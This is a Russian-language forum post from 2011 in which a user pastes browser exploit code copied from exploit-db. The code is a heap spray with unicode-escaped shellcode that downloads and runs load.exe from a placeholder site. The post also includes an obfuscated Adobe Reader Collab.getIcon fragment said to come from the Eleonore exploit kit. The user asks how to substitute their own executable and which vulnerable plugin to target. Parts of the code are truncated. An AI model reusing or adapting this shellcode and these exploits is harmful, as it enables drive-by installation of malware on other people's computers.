| GibridMelody |
15.10.2011 22:23 |
Нашёл на exploit-db сплойт:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// 0x48k-ymj by ...
// based on /5043
// Bug discovered by Krystian Kloskowski (h07)
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]unescape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtoupper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]bin2hex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$g[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]round[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$g[/COLOR][COLOR="#007700"]!= ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"00"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$out[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]
function gsc(){
var hsta = 0x0c0c0c0c;
var plc = unescape("%u4343%u4343"+
"%u0feb%u335b%u66c9%u80b9%u8001%uef33"+
"%ue243%uebfa%ue805%uffec%uffff%u8b7f"+
"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"+
"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"+
"%u6187%ue1a1%u0703%uef11%uefef%uaa66"+
"%ub9eb%u7787%u6511%u07e1%uef1f%uefef"+
"%uaa66%ub9e7%uca87%u105f%u072d%uef0d"+
"%uefef%uaa66%ub9e3%u0087%u0f21%u078f"+
"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"+
"%u0757%uef29%uefef%uaa66%uaffb%ud76f"+
"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"+
"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"+
"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"+
"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"+
"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"+
"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"+
"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"+
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"+
"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"+
"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+
"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+
"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+
"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+
"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+
"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+
"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+
"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+
"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+
"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+
"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+
"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+
"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+
"%u1011%uba10%ua3bd%ua0a2%uefa1"+
"'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]unescape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://site.come/load.exe"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'");
var hbs=0x400000;
var pls=plc.length*2;
var sss=hbs-(pls+0x38);
var ss=unescape("%u0c0c%u0c0c");
ss=gss(ss,sss);
hbs=(hsta-0x400000)/hbs;
for(i=0;i
'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Я хотел спросить у вас вы лучше меня знаете я уверен...
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]var[/COLOR][COLOR="#0000BB"]plc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unescape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"%u4343%u4343"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u0feb%u335b%u66c9%u80b9%u8001%uef33"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%ue243%uebfa%ue805%uffec%uffff%u8b7f"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u6187%ue1a1%u0703%uef11%uefef%uaa66"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%ub9eb%u7787%u6511%u07e1%uef1f%uefef"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uaa66%ub9e7%uca87%u105f%u072d%uef0d"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uefef%uaa66%ub9e3%u0087%u0f21%u078f"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u0757%uef29%uefef%uaa66%uaffb%ud76f"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"%u1011%uba10%ua3bd%ua0a2%uefa1"[/COLOR][COLOR="#007700"]+
[/COLOR][COLOR="#DD0000"]"'.unescape("[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/load.exe").'");[/COLOR][/COLOR]
Это шел код который устонавливает load.exe в систему с сайта site. Тоесть я его залью укажу свой файл и запущу с уязвимым плагином или что там и он будет работать??
Вот ещё хотел спросить под что он чтоб я опробывать смог... Взял отсюда http://www.exploit-db.com/exploits/5046/
Тоесть что мне поставить подо что он??
Вот ещё сплойт:
Взял из элеонорки
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]= 9){
try {if (app.doc.Collab.getIcon){'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rnd_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'(2);var '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rnd_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' = unescape("%09");
while ('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rnd_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.length = 7.1&& '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rnd_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' > 4);
chr2 = ((enc2 & 15) > 2);
chr3 = ((enc3 & 3) [/COLOR][/COLOR]
Спасибо.
|